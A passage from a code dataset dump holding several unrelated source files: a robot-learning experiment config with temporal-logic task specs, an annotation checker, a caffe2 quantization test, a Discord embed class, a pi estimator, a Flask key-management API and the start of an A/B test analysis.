LearningEnv\n self.mdp_env_config = {\n # Common to all envs\n \"seed\": 10,\n \"state_space\": mdp_config['state_space'],\n \"action_space\": mdp_config['action_space'],\n \"get_state\": mdp_config['get_state'],\n \"get_reward\": mdp_config['get_reward'],\n \"is_done\": mdp_config['is_done'],\n \"get_info\": None,\n #### class specific ####\n \"WPGenerator\": {\n 'type': traj_gen_type,\n 'config': traj_gen_config\n },\n # for cooking environment\n \"BaseEnv\":{\n 'type': CookingEnv,\n 'config': {\n # specific to this env\n \"suffix\": \"\",\n \"particle_test\": self.ExperimentConfig_config.get('particle_test'),\n \"arm\": self.robot,\n \"control_mode\": \"velocity\"\n }\n }\n }\n\n else:\n raise ValueError('unsupported environment')\n\n return self.mdp_env_type, self.mdp_env_config\n\n def construct_traj_generator(self, translation_gen=\"clf_cbf\", orientation_gen='dmp'):\n from traj_generators.trajectory_generator import TrajectoryGenerator\n\n config = {\n 'dmp_config': {\n # gain on attractor term y dynamics (linear)\n 'ay': 55,\n # gain on attractor term y dynamics (linear)\n 'by': None,\n # gain on attractor term y dynamics (angular)\n 'az': 55,\n # gain on attractor term y dynamics (angular)\n 'bz': None,\n # timestep\n 'dt': 0.005,\n # time scaling, increase tau to make the system execute faster\n 'tau': 1.,\n 'use_canonical': False,\n # for canonical\n 'apx': 1.,\n 'gamma': 0.3,\n # for faster convergence\n 'app': 0.5,\n 'apr': 0.5,\n # for integrating goal\n 'ag': 3.0,\n 'ago': 3.0,\n # if True, then update according to dmp_pose, else update according to current pose\n 'use_dmp_pose': True,\n 'n_linear_dmp': 3,\n 'n_angular_dmp': 3\n },\n 'clf_cbf_config': {\n 'k_cbf': 1.1,\n 'epsilon':0.8,\n 'num_states':3,\n 'action_space': {'shape': (3,), 'upper_bound': 0.2 * np.ones(3), 'lower_bound': -0.2 * np.ones(3)},\n 'use_own_pose': True,\n 'dt': 0.05,\n 'log_dir': os.path.join(os.environ['LEARNING_PATH'], 'execution', 'log')\n },\n 'translation_gen': translation_gen,\n 'orientation_gen': orientation_gen\n }\n\n return TrajectoryGenerator, config\n\n\n def serve_task_mdp_config(self, get_state_fn=None, obs_dim=None): \n #### State ####\n def get_state(all_info):\n if not get_state_fn:\n raise ValueError('need to provide get_state_fn')\n else:\n mdp_state = get_state_fn(all_info)\n return mdp_state\n\n #### Reward ####\n def get_reward(state=None, action=None, next_state=None, all_info=None):\n return 0\n \n #### Done ####\n def is_done(state=None, action=None, next_state=None, all_info=None):\n return False\n \n state_space = {'type': 'float', 'shape': (obs_dim, ), 'upper_bound': [], 'lower_bound': []}\n\n action_coeff = 120\n action_space = {'type': 'float', 'shape': (3, ), \"upper_bound\": np.ones(3) * action_coeff, \"lower_bound\": -np.ones(3) * action_coeff}\n\n\n #### Reset ####\n reset_config = {}\n \n from learning.reset.experiment_env_reset import ExperimentEnvVrepReset\n\n other = {'reset': {'type': None, 'config': reset_config}}\n\n return get_state, get_reward, is_done, state_space, action_space, other\n\n \n \n def makehotdog_task_mdp_config(self, get_state_fn=None, obs_dim=None): \n #### State ####\n def get_state(all_info):\n if not get_state_fn:\n raise ValueError('need to provide get_state_fn')\n else:\n mdp_state = get_state_fn(all_info)\n return mdp_state\n\n #### Reward ####\n def get_reward(state=None, action=None, next_state=None, all_info=None):\n return 0\n \n #### Done ####\n def is_done(state=None, action=None, next_state=None, all_info=None):\n return False\n \n state_space = {'type': 'float', 'shape': (obs_dim, ), 'upper_bound': [], 'lower_bound': []}\n\n translation_coeff = 0.2\n rotation_coeff = 200\n vel_upper = np.concatenate([translation_coeff * np.ones(3), rotation_coeff*np.ones(3)])\n vel_lower = -np.concatenate([translation_coeff * np.ones(3), rotation_coeff*np.ones(3)])\n upper_bound = np.hstack([1, vel_upper])\n lower_bound = np.hstack([0, vel_lower])\n action_space = {'type': 'float', 'shape': (7, ), \"upper_bound\": upper_bound, \"lower_bound\": lower_bound}\n\n\n #### Reset ####\n reset_config = {}\n \n from learning.reset.experiment_env_reset import ExperimentEnvVrepReset\n\n other = {'reset': {'type': None, 'config': reset_config}}\n\n return get_state, get_reward, is_done, state_space, action_space, other\n\n \n def switch_task_mdp_config(self, on_or_off='on'):\n\n #### State ####\n def get_state(all_info):\n # mdp_state = np.array(list(all_info['target_pos']) + \\\n # list(all_info['target_quat']))\n mdp_state = np.array(all_info['curr_pose'])[:3]\n return mdp_state\n\n #### Reward ####\n def get_reward(state=None, action=None, next_state=None, all_info=None):\n button_vel = all_info['button_vel']\n button_joint_frame_angle = all_info['button_angle']\n\n r = -10*(button_joint_frame_angle - 1.15)\n\n if button_joint_frame_angle < 0.6:\n r += 5.\n\n motion_range = all_info['motion_range']\n low = np.array([motion_range['x'][0], motion_range['y'][0], motion_range['z'][0]])\n high = np.array([motion_range['x'][1], motion_range['y'][1], motion_range['z'][1]])\n target_pos = state[:3]\n\n ## done if move outside of motion region\n if any(target_pos < low) or any(target_pos > high):\n r -= 1.5\n\n button_disturbance = np.linalg.norm(np.concatenate([button_vel[:3], button_vel[-2:]]))\n if button_disturbance > 0.1:\n r = -2.\n \n return r\n \n \n #### Done ####\n def is_done(state=None, action=None, next_state=None, all_info=None):\n done = False\n motion_range = all_info['motion_range']\n low = np.array([motion_range['x'][0], motion_range['y'][0], motion_range['z'][0]])\n high = np.array([motion_range['x'][1], motion_range['y'][1], motion_range['z'][1]])\n target_pos = state[:3]\n\n ## done if move outside of motion region\n if any(target_pos < low) or any(target_pos > high):\n print(\"done: moved outside of motion region\")\n done = True\n\n ## done if reached goal\n goal_dist = np.linalg.norm(target_pos - all_info['goal'][:3])\n if goal_dist < 0.01:\n print(\"done: reached goal\")\n done = True\n\n ## done if hit button \n button_vel = all_info['button_vel']\n button_disturbance = np.linalg.norm(np.concatenate([button_vel[:3], button_vel[-2:]]))\n if button_disturbance > 0.1:\n print('done: button pushed away from nominal')\n done = True\n\n ## done if finished task\n toaster_joint_frame_angle = all_info['button_angle']\n # print(all_info['button_joint_frame_angle'][2])\n if toaster_joint_frame_angle < 0.57:\n print('done: turn on task done')\n done = True\n \n return done\n \n state_space = {'type': 'float', 'shape': (3, ), 'upper_bound': [], 'lower_bound': []}\n\n action_coeff = 120\n action_space = {'type': 'float', 'shape': (3, ), \"upper_bound\": np.ones(3) * action_coeff, \"lower_bound\": -np.ones(3) * action_coeff}\n\n\n #### Reset ####\n reset_config = {}\n \n from learning.reset.experiment_env_reset import ExperimentEnvVrepReset\n\n other = {'reset': {'type': None, 'config': reset_config}}\n\n return get_state, get_reward, is_done, state_space, action_space, other\n\n def get_tl_related(self, task='makehotdog'):\n from tl_utils.tl_config import TLConfig\n\n tlconfig = TLConfig({'robot': self.robot, 'mode': 'sim'})\n\n if task == 'makehotdog' and self.robot == 'jaco':\n task_spec_wo_condiment = \"moveto_world_jaconeutral && X F\" + \\\n \"((closegripper) && X F (\" + \\\n \"(moveto_hotdogplate && opengripper) && X F \" + \\\n \"(closegripper && X F \" + \\\n \"((moveto_grill && closegripper) && X F \" + \\\n \"(opengripper && X F \"+ \\\n \"(moveto_world_jaconeutral && X F \" + \\\n \"((moveto_grill && opengripper) && X F \" + \\\n \"(closegripper && X F \"+\\\n \"((moveto_bunplate && closegripper) && X F \"+\\\n \"(opengripper && X F \" + \\\n \"(moveto_world_jaconeutral\" + \\\n \")))))))))))\"\n\n apply_condiment_ = \"(moveto_condiment_condimentpre && opengripper) && X F \" + \\\n \"(moveto_condiment_condimentpost && X F \" + \\\n \"(closegripper && X F \"+ \\\n \"((moveto_bunplate_relativeplateapplycondimentpost && closegripper) && X F \"+\\\n \"((moveto_world_placecondimentgoal && closegripper) && X F\" + \\\n \"(opengripper && X F\" + \\\n \"(moveto_condiment_condimentpre\" + \\\n \"))))))\"\n\n\n # entire_task_w_condiment = \"moveto_world_jaconeutral && X F\" + \\\n # \"((flipswitchon && closegripper) && X F \" + \\\n # \"((moveto_hotdogplate && opengripper) && X F \" + \\\n # \"(closegripper && X F \" + \\\n # \"((moveto_grill && closegripper) && X F \" + \\\n # \"(opengripper && X F \"+ \\\n # \"(moveto_world_jaconeutral && X F \" + \\\n # \"((moveto_grill && opengripper) && X F \" + \\\n # \"(closegripper && X F \"+\\\n # \"((moveto_bunplate && closegripper) && X F \"+\\\n # \"(opengripper && X F \" + \\\n # \"((moveto_condiment_condimentpre && opengripper) && X F \" + \\\n # \"(moveto_condiment_condimentpost && X F \" + \\\n # \"(closegripper && X F \"+ \\\n # \"((moveto_bunplate_relativeplateapplycondimentpost && closegripper) && X F \"+\\\n # \"(applycondiment && X F\" + \\\n # \"((moveto_world_placecondimentgoal && closegripper) && X F\" + \\\n # \"(opengripper && X F\" + \\\n # \"(moveto_world_jaconeutral && X F\" + \\\n # \"(closegripper && X F\" + \\\n # \"(flipswitchoff && X F\" + \\\n # \"(moveto_world_jaconeutral\" +\\\n # \")))))))))))))))))))))\"\n\n\n entire_task_w_condiment = \"moveto_world_jaconeutral && X F\" + \\\n \"((flipswitchon && closegripper) && X F \" + \\\n \"((moveto_hotdogplate && opengripper) && X F \" + \\\n \"(closegripper && X F \" + \\\n \"((moveto_grill && closegripper) && X F \" + \\\n \"(opengripper && X F \"+ \\\n \"((moveto_world_jaconeutral && opengripper) && X F \" + \\\n \"((moveto_grill && opengripper) && X F \" + \\\n \"(closegripper && X F \"+\\\n \"((moveto_bunplate && closegripper) && X F \"+\\\n \"(opengripper && X F \" + \\\n \"((moveto_condiment_condimentpre && opengripper) && X F \" + \\\n \"(moveto_condiment_condimentpost && X F \" + \\\n \"(closegripper && X F \"+ \\\n \"((moveto_world_applycondimentpre && closegripper) && X F \"+\\\n \"((moveto_world_applycondimentpost && closegripper) && X F \"+\\\n \"((moveto_world_placecondimentgoal && closegripper) && X F\" + \\\n \"(opengripper && X F\" + \\\n \"(moveto_world_jaconeutral && X F\" + \\\n \"(flipswitchoff && X F \" + \\\n \"(moveto_world_jaconeutral\" + \\\n \"))))))))))))))))))))\"\n \n\n \n task_spec = \"F(\" + entire_task_w_condiment + \")\"\n # task_spec = \"F(closegripper && X F (moveto_grill))\"\n \n elif task == 'serve' and self.robot == 'baxter':\n # serve = \"(moveto_bunplate && opengripper) && X F \" + \\\n # \"(closegripper && X F \" + \\\n # \"((moveto_serveplate && closegripper) && X F \" + \\\n # \"(opengripper && X F \"+ \\\n # \"(moveto_world_baxterneutral \" + \\\n # \"))))\"\n\n serve = \"(moveto_bunplate && opengripper) && X F \" + \\\n \"(closegripper && X F \" + \\\n \"((moveto_serveplate && closegripper) && X F \" + \\\n \"(opengripper && X F \"+ \\\n \"(moveto_world_baxterneutral \" + \\\n \"))))\"\n\n\n #### serve task KG ####\n serve_task_KB = \"G (!(moveto_serveplate && moveto_bunplate)) && \" + \\\n \"G (!(opengripper && closegripper)) && \" + \\\n \"G (!(moveto_serveplate && moveto_world_baxterneutral)) && \" + \\\n \"G (!(moveto_bunplate && moveto_world_baxterneutral)) && \" + \\\n \"G (!(moveto_serveplate && moveto_bunplate && moveto_world_baxterneutral))\"\n \n\n #### FSA version\n # serve_task_ = \"(( inservezone_serveplate -> X F (\" + serve + \")) && (!inservezone_serveplate -> X F moveto_world_baxterneutral))\" + \" && \" + serve_task_KB\n\n # task_spec = \"F(\" + serve + \" )&& (! (\" + serve + \") U inservezone_serveplate)\" + \" && \" + serve_task_KB\n\n task_spec = \"F(\" + serve + \" ) && (! (\" + serve + \") U (inservezone_serveplate && hotdogready))\" + \" && \" + serve_task_KB\n \n #### Buchi version \n # serve_task_ = \"G (( inservezone_serveplate -> X F (\" + serve + \")))\" + \" && \" + serve_task_KB\n\n else:\n raise ValueError('task and robot do not match')\n\n\n return task_spec, tlconfig.construct_skill_state, tlconfig.PREDICATES, tlconfig.obs_dim\n \nif __name__ == \"__main__\":\n pass","repo_name":"xli4217/cbf_learning_feasibility","sub_path":"docker/dirs-to-copy/learning/experiment_config.py","file_name":"experiment_config.py","file_ext":"py","file_size_in_byte":22269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1732283897","text":"import os\nimport json\n\n\ndef read_json(json_file_path):\n\tjson_cont = None\n\twith open(json_file_path, 'r') as f:\n\t\tjson_cont = json.load(f)\n\treturn json_cont\n\n\n\ndef check_diff(json_cont, img_dir):\n file_key_list = list(json_cont.keys())\n\n\n json_img_name = []\n\n for file_key in file_key_list:\n image_file_name = json_cont[file_key]['filename']\n #print(image_file_name)\n json_img_name.append(image_file_name)\n\n print(\"The number of image name in the annotated json is {}.\\n\".format(len(json_img_name)))\n set1_json = set(json_img_name)\n\n #print(set1)\n\n img = []\n\n for files in os.listdir(img_dir):\n if files.startswith('.') is False and files.endswith('json') is False:\n img.append(files)\n # print(files)\n\n print(\"The number of images in the image directory is {}.\\n\".format(len(img)))\n set2_img = set(img)\n diff_in_set1_json_set2_img = set1_json - set2_img\n if len(diff_in_set1_json_set2_img) == 0:\n print(\"The number of annotated images in the json is the same as the number of images in the image directory.\\n\")\n else:\n print(\"The are {} more annotations in the JSON than the number of images in the image directory.\".format(len(diff_in_set1_json_set2_img)))\n print(\"\\nThe extra annotations are: \\n{}\\n\".format(diff_in_set1_json_set2_img))\n\n diff_in_set2_img_set1_json = set2_img - set1_json\n if len(diff_in_set2_img_set1_json) == 0:\n print(\"The number of images in the image directory is the same as the number of annotated images in the JSON file.\\n\")\n else:\n print(\"{} images present in the image directory is not in the annotated JSON.\".format(len(diff_in_set2_img_set1_json)))\n print(\"\\nThe extra images are: \\n{}\\n\".format(diff_in_set2_img_set1_json))\n\nif __name__ == '__main__':\n\n \"\"\"\n IMG_SOURCE_DIR = folder that store all batches of images and json file\n \"\"\"\n\n IMG_SOURCE_DIR = '/Users/johnathontoh/Desktop/python_files/dataset/farm_dams/image_source'\n\n for folder in os.listdir(IMG_SOURCE_DIR):\n if folder.startswith('.') is False:\n folder_path = os.path.join(IMG_SOURCE_DIR, folder)\n for files in os.listdir(folder_path):\n if files.startswith('.') is False and files.endswith('.json') is True:\n print(\"--------------------------\\n\")\n print(\"Directory: {}\\n\".format(folder_path))\n json_file = read_json(os.path.join(folder_path, files))\n check_diff(json_file, folder_path)\n\n\n\n\n\n\n","repo_name":"applecrumble123/MaskRCNN","sub_path":"validate_img_dir_and_json/check_img_and_json.py","file_name":"check_img_and_json.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14817447359","text":"\n\nimport collections\n\nimport caffe2.python.hypothesis_test_util as hu\nimport hypothesis.strategies as st\nimport numpy as np\nfrom caffe2.python import core, dyndep, workspace\nfrom caffe2.quantization.server.dnnlowp_test_utils import check_quantized_results_close\nfrom hypothesis import given\n\n\ndyndep.InitOpsLibrary(\"//caffe2/caffe2/quantization/server:dnnlowp_ops\")\nworkspace.GlobalInit([\"caffe2\", \"--caffe2_omp_num_threads=11\"])\n\n\nclass DNNLowPDequantizeOpTest(hu.HypothesisTestCase):\n @given(size=st.integers(1024, 2048), is_empty=st.booleans(), **hu.gcs_cpu_only)\n def test_dnnlowp_dequantize(self, size, is_empty, gc, dc):\n if is_empty:\n size = 0\n min_ = -10.0\n max_ = 20.0\n X = (np.random.rand(size) * (max_ - min_) + min_).astype(np.float32)\n\n Output = collections.namedtuple(\"Output\", [\"Y\", \"op_type\", \"engine\"])\n outputs = []\n\n op_type_list = [\"Dequantize\", \"Int8Dequantize\"]\n engine = \"DNNLOWP\"\n\n outputs.append(Output(X, op_type=\"\", engine=\"\"))\n\n for op_type in op_type_list:\n net = core.Net(\"test_net\")\n\n quantize = core.CreateOperator(\n \"Quantize\", [\"X\"], [\"X_q\"], engine=engine, device_option=gc\n )\n net.Proto().op.extend([quantize])\n\n dequantize = core.CreateOperator(\n op_type, [\"X_q\"], [\"Y\"], engine=engine, device_option=gc\n )\n net.Proto().op.extend([dequantize])\n\n self.ws.create_blob(\"X\").feed(X, device_option=gc)\n self.ws.run(net)\n outputs.append(\n Output(Y=self.ws.blobs[\"Y\"].fetch(), op_type=op_type, engine=engine)\n )\n\n check_quantized_results_close(outputs)\n","repo_name":"pytorch/pytorch","sub_path":"caffe2/quantization/server/dequantize_dnnlowp_op_test.py","file_name":"dequantize_dnnlowp_op_test.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"36213685656","text":"import random\r\n\r\n\r\ndef estimate_pi(n):\r\n num_point_circle = 0\r\n num_point_total = 0\r\n for _ in range(n):\r\n x = random.uniform(0, 1)\r\n y = random.uniform(0, 1)\r\n distance = x ** 2 + y ** 2\r\n if distance <= 1:\r\n num_point_circle += 1\r\n num_point_total += 1\r\n\r\n return 4 * num_point_circle / num_point_total\r\n\r\n\r\ndef main():\r\n print(\"Write how many dots you want in your square-circle!\\n\")\r\n x = input()\r\n print(\"Your pi is: \", estimate_pi(int(x)))\r\n\r\n\r\nmain()\r\n","repo_name":"LucaPredieri/EstimatePi","sub_path":"EstimatePi.py","file_name":"EstimatePi.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42093138047","text":"\"\"\"\n Defines routes for key resource\n\"\"\"\n\n# Imports libraries\nfrom functools import reduce\n\n# Import flask objects\nfrom flask import Blueprint, Response, current_app, jsonify, session, \\\n request, abort, make_response\n\n# Import mongo objects\nfrom mongoengine.queryset.visitor import Q\nfrom mongoengine import *\n\n# Import schemas\nfrom ..schemas.key import Key\nfrom ..schemas.user import User\n\n# Import validation\nfrom ..utils.validation import validate_authenticated_admin\n\n# List of possible request parameters\npossible_params: list = [\"tag_number\", \"series_id\", \"sequence_id\",\n \"building\", \"key_type\", \"location\", \"is_available\", \"comment\"]\n\n# Define the blueprint\nblueprint_keys: Blueprint = Blueprint(\n name=\"blueprint_keys\", import_name=__name__)\n\n\n# region Routes\n\n@blueprint_keys.route(\"/keys\", methods=[\"GET\"])\ndef get_all_keys() -> Response:\n \"\"\"Get all keys in the database\n\n Returns:\n Response: A json array of all keys in the database\n \"\"\"\n\n # Require admin priviledges (abort if failure)\n validate_authenticated_admin()\n\n # Get all keys in the database\n result: list = Key.objects()\n\n # If there was nothing in the database, return an empty list\n if not result:\n return jsonify([])\n\n # Finally, return the result as json\n return jsonify(result)\n\n\n@blueprint_keys.route(\"/keys/\", methods=[\"GET\"])\ndef get_key(tag_number: str) -> Response:\n \"\"\"Get a specific key in the database\n\n Args:\n tag_number (str): The tag number for the key of interest\n\n Returns:\n Response: A json of the specific key. Otherwise, a response\n indicating failure.\n \"\"\"\n\n # Require admin priviledges (abort if failure)\n validate_authenticated_admin()\n\n try:\n # Find the key\n key: Key = Key.objects.get(tag_number=tag_number)\n\n # Return the key as json\n return jsonify(key)\n\n # Handle key not found\n except Key.DoesNotExist:\n return f\"Error! Key with tag {tag_number} does not exist!\", 404\n\n # Catch all other errors\n except Exception as e:\n return f\"Error with getting key: {e}\", 400\n\n\n@blueprint_keys.route(\"/keys//owner\", methods=[\"GET\"])\ndef get_key_owner(tag_number: str) -> Response:\n \"\"\"Get the owner of a specific key in the database\n\n Args:\n tag_number (str): The tag number for the key of interest\n\n Returns:\n Response: A json of the specific key's owner. Otherwise, a response\n indicating failure.\n \"\"\"\n\n # Require admin priviledges (abort if failure)\n validate_authenticated_admin()\n\n try:\n # Find the key\n key: Key = Key.objects.get(tag_number=tag_number)\n\n # Next, find all owners of the key\n owned_users: list = User.objects(Q(owned_keys__in=[key]))\n\n # If there is at least one user who owns this key, return the (first) owner as json\n if owned_users:\n return jsonify(owned_users[0])\n \n # Else, return failure\n return f\"Error! Key does not have an owner!\", 404\n\n # Handle key not found\n except Key.DoesNotExist:\n return f\"Error! Key with tag {tag_number} does not exist!\", 404\n\n # Catch all other errors\n except Exception as e:\n return f\"Error with getting key: {e}\", 400\n\n\n@blueprint_keys.route(\"/keys\", methods=[\"POST\"])\ndef add_key() -> Response:\n \"\"\"Add a key to the database\n\n Returns:\n Response: A response indicating whether adding the key was successful\n or not.\n \"\"\"\n\n # Require admin priviledges (abort if failure)\n validate_authenticated_admin()\n\n # Get the json from the body\n data: dict = request.get_json()\n\n try:\n\n # Prepare tag number\n # tag_number: str = str(data[\"tag_number\"]).strip()\n\n # Ensure that this key has a unique tag number\n if Key.objects(Q(tag_number=data[\"tag_number\"])):\n return f\"Error! A key with tag number {data['tag_number']} already exists!\", 400\n\n # Ensure that this key has a unique series id and sequence id\n if Key.objects(Q(series_id=data[\"series_id\"]) & Q(sequence_id=data[\"sequence_id\"])):\n return f\"Error! A key with series id {data['series_id']} and sequence id {data['sequence_id']} already exists!\", 400\n\n # Build locations\n location_list = str(data[\"location\"]).split(\",\")\n for index, loc in enumerate(location_list):\n location_list[index] = loc.strip()\n\n # Construct new key\n new_key: Key = Key(\n tag_number=str(data[\"tag_number\"]).strip(),\n series_id=str(data[\"series_id\"]).strip(),\n sequence_id=int(data[\"sequence_id\"]),\n building=str(data[\"building\"]).strip(),\n key_type=str(data[\"key_type\"]).strip(),\n location=location_list,\n is_available=str(data[\"is_available\"]).lower() == \"true\",\n comment=str(data[\"comment\"]).strip()\n )\n\n # Now save it into the database\n new_key.save()\n\n # Report done\n tagNum = str(data[\"tag_number\"]).strip()\n return f\"Successfully added key with tag number {tagNum}\", 200\n\n # Handle bad values\n except ValidationError as verror:\n return f\"Error on updating user: {verror}. Regex errors suggest mistakenly using special characters!\", 400\n\n # Handle dictionary key error\n except KeyError as kerror:\n return f\"Error on adding key: {kerror}\", 400\n\n # Handle type error\n except TypeError as terror:\n return f\"Error on adding key: {terror}\", 400\n\n # Catch all other errors\n except Exception as e:\n return f\"Error with adding key: {e}\", 400\n\n\n@blueprint_keys.route(\"/keys/\", methods=[\"PATCH\"])\ndef update_key(old_tag_number: str) -> Response:\n \"\"\"Update a specific key's properties in the database\n\n Args:\n tag_number (str): The tag number for the key of interest\n\n Returns:\n Response: A response indicating whether updating the key was successful\n or not.\n \"\"\"\n\n # Require admin priviledges (abort if failure)\n validate_authenticated_admin()\n\n # Get the json from the body\n data: dict = request.get_json()\n\n try:\n # Find the key\n key: Key = Key.objects.get(tag_number=old_tag_number)\n\n ####################################################################################\n #delete if statements checking if in data (ex. if series_id in data)\n #keep the checks for uniqueness\n #if passing those checks, key.update(data)\n #where ever this is called, need to change parameters to pass in old tag number and new tag number\n ####################################################################################\n\n # Ensure that this key has a unique tag number\n # maybe add statement checking if it is the previous tag number\n if Key.objects(Q(tag_number=data[\"tag_number\"])) and data[\"tag_number\"] != old_tag_number:\n return f\"Error! A key with tag number {data['tag_number']} already exists!\", 400\n\n # Ensure that this key has a unique series id and sequence id\n # maybe add statement checking if it is the previous series and sequence id\n if Key.objects(Q(series_id=data[\"series_id\"]) & Q(sequence_id=data[\"sequence_id\"])) and key.series_id != data[\"series_id\"] and key.sequence_id != data[\"sequence_id\"]:\n return f\"Error! A key with series id {data['series_id']} and sequence id {data['sequence_id']} already exists!\", 400\n\n # Update tag number\n # if \"tag_number\" in data:\n # # Ensure that this key has a unique tag number\n # if Key.objects(Q(tag_number=data[\"tag_number\"])):\n # return f\"Error! A key with tag number {data['tag_number']} already exists!\", 400\n\n key.update(set__tag_number=str(data[\"tag_number\"]).strip())\n\n # Update series id\n key.update(set__series_id=str(data[\"series_id\"]).strip())\n\n # Update sequence id\n key.update(set__sequence_id=int(data[\"sequence_id\"]))\n\n # Update building\n key.update(set__building=str(data[\"building\"]).strip())\n\n # Update key type\n key.update(set__key_type=str(data[\"key_type\"]).strip())\n\n # Update location\n if \"location\" in data:\n # Build locations\n location_list = str(data[\"location\"]).split(\",\")\n for index, loc in enumerate(location_list):\n # Remove unnecessary elements from loc\n location_list[index] = loc.replace(\"[\", \"\").replace(\"]\", \"\").replace(\"'\", \"\").strip()\n key.update(set__location=location_list)\n \n # Update comment\n key.update(set__comment=str(data[\"comment\"]).strip())\n\n # Report done\n return f\"Succesfully updated key with tag number {data['tag_number']}\", 200\n\n # Handle key not found\n except Key.DoesNotExist:\n return f\"Error! Key with tag {old_tag_number} does not exist!\", 404\n\n # Handle bad values\n except ValidationError as verror:\n return f\"Error on updating key: {verror}. Regex errors suggest mistakenly using special characters!\", 400\n\n # Handle dictionary key error\n except KeyError as kerror:\n return f\"Error on updating key: {kerror}\", 400\n\n # Handle type error\n except TypeError as terror:\n return f\"Error on updating key: {terror}\", 400\n\n # Catch all other errors\n except Exception as e:\n return f\"Error with updating key: {e}\", 400\n\n\n@blueprint_keys.route(\"/keys//return\", methods=[\"PATCH\"])\ndef return_key(tag_number: str) -> Response:\n \"\"\"Safely return a key back to the system\n\n Args:\n tag_number (str): The tag number for the key of interest\n\n Returns:\n Response: A response indicating whether returning the key was successful\n or not.\n \"\"\"\n\n # Require admin priviledges (abort if failure)\n validate_authenticated_admin()\n\n try:\n # Find the key\n key: Key = Key.objects.get(tag_number=tag_number)\n\n # We need to find all users who have this key owned\n owned_users: list = User.objects(Q(owned_keys__in=[key]))\n\n # If there is at least one user who owns this key, fail\n # because we cannot safely return the key\n if owned_users:\n return f\"Error! Cannot return key because {owned_users[0].pid} owns this still!\", 400\n\n # Mark the key as available\n key.update(set__is_available=True)\n\n # Report done\n return f\"Sucessfully returned key with tag number {tag_number}\", 200\n\n # Handle key not found\n except Key.DoesNotExist:\n return f\"Error! Key with tag {tag_number} does not exist!\", 404\n\n # Catch all other errors\n except Exception as e:\n return f\"Error with returning key: {e}\", 400\n\n\n@blueprint_keys.route(\"/keys/\", methods=[\"DELETE\"])\ndef delete_key(tag_number: str) -> Response:\n \"\"\"Delete a specific key in the database\n\n Args:\n tag_number (str): The tag number for the key of interest\n\n Returns:\n Response: A response indicating whether deleting the key was successful\n or not.\n \"\"\"\n\n # Require admin priviledges (abort if failure)\n validate_authenticated_admin()\n\n try:\n # Find the key\n key: Key = Key.objects.get(tag_number=tag_number)\n\n # We need to find all users who have this key owned\n owned_users: list = User.objects(Q(owned_keys__in=[key]))\n\n # Delete this key off the owned keys array for all users\n for user in owned_users:\n user.owned_keys.remove(key) # remove the key\n user.save() # save user details in database\n\n # Now delete the key off the system entirely\n key.delete()\n\n # Report done\n return f\"Successfully deleted key with tag number {tag_number}\", 200\n\n # Handle key not found\n except Key.DoesNotExist:\n return f\"Error! Key with tag {tag_number} does not exist!\", 404\n\n # Catch all other errors\n except Exception as e:\n return f\"Error with deleting key: {e}\", 400\n\n# endregion\n","repo_name":"pasha-ran/capstone","sub_path":"keymanagementsystem/backend/src/routes/blueprint_keys.py","file_name":"blueprint_keys.py","file_ext":"py","file_size_in_byte":12209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13504062836","text":"class Embed:\n def __init__(\n self,\n title: str,\n description: str,\n color: int,\n ):\n self.title = title\n self.description = description\n self.color = color\n self.footer = {}\n self.author = {}\n self.fields = []\n\n def set_footer(self, text: str, icon_url: str = None):\n self.footer = {\n \"text\": text,\n \"icon_url\": icon_url,\n }\n\n def set_author(self, name: str, url: str = None, icon_url: str = None):\n self.author = {\n \"name\": name,\n \"url\": url,\n \"icon_url\": icon_url,\n }\n\n def add_field(self, name: str, value: str, inline: bool = False):\n self.fields.append({\n \"name\": name,\n \"value\": value,\n \"inline\": inline,\n })\n\n def to_dict(self):\n return {\n \"title\": self.title,\n \"description\": self.description,\n \"color\": self.color,\n \"footer\": self.footer,\n \"author\": self.author,\n \"fields\": self.fields,\n }","repo_name":"Jeff53978/MicroCord","sub_path":"microcord/embed.py","file_name":"embed.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"30148276345","text":"# Cookie Cats is a hugely popular mobile puzzle game developed by Tactile Entertainment.\n# It's a classic \"connect three\" style puzzle game where the player must connect tiles of the same color in order to\n# clear the board and win the level. It also features singing cats. We're not kidding!\n#\n# As players progress through the game they will encounter gates that force them\n# to wait some time before they can progress or make an in-app purchase.\n# In this project, we will analyze the result of an A/B test where the first gate in Cookie Cats was moved from level 30 to level 40.\n# In particular, we will analyze the impact on player retention.\n#\n# To complete this project, you should be comfortable working with pandas DataFrames and with using the pandas plot method.\n# You should also have some understanding of hypothesis testing and bootstrap analysis.\n\n# userid - a unique number that identifies each player.\n# version - whether the player was put in the control group (gate_30 - a gate at level 30) or the test group (gate_40 - a gate at level 40).\n# sum_gamerounds - the number of game rounds played by the player during the first week after installation.\n# retention_1 - did the player come back and play 1 day after installing?\n# retention_7 - did the player come back and play 7 days after installing?\n# When a player installed the game, he or she was randomly assigned to either gate_30 or gate_40.\n\n\nimport itertools\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n# !pip install statsmodels\nimport statsmodels.stats.api as sms\nfrom scipy.stats import ttest_1samp, shapiro, levene, ttest_ind, mannwhitneyu, \\\n pearsonr, spearmanr, kendalltau, f_oneway, kruskal\nfrom statsmodels.stats.proportion import proportions_ztest\n\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', 10)\npd.set_option('display.float_format', lambda x: '%.5f' % x)\n\n# Data Preparing\n\ndf_ = pd.read_csv(\"Data/cookie_cats.csv\")\ndf = df_.copy()\ndf.head()\n\n# Data Control\ndef check_df(dataframe, head=5):\n print(\"##################### Shape #####################\")\n print(dataframe.shape)\n print(\"##################### Types #####################\")\n print(dataframe.dtypes)\n print(\"##################### Head #####################\")\n print(dataframe.head(head))\n print(\"##################### Tail #####################\")\n print(dataframe.tail(head))\n print(\"##################### NA #####################\")\n print(dataframe.isnull().sum())\n print(\"##################### Quantiles #####################\")\n 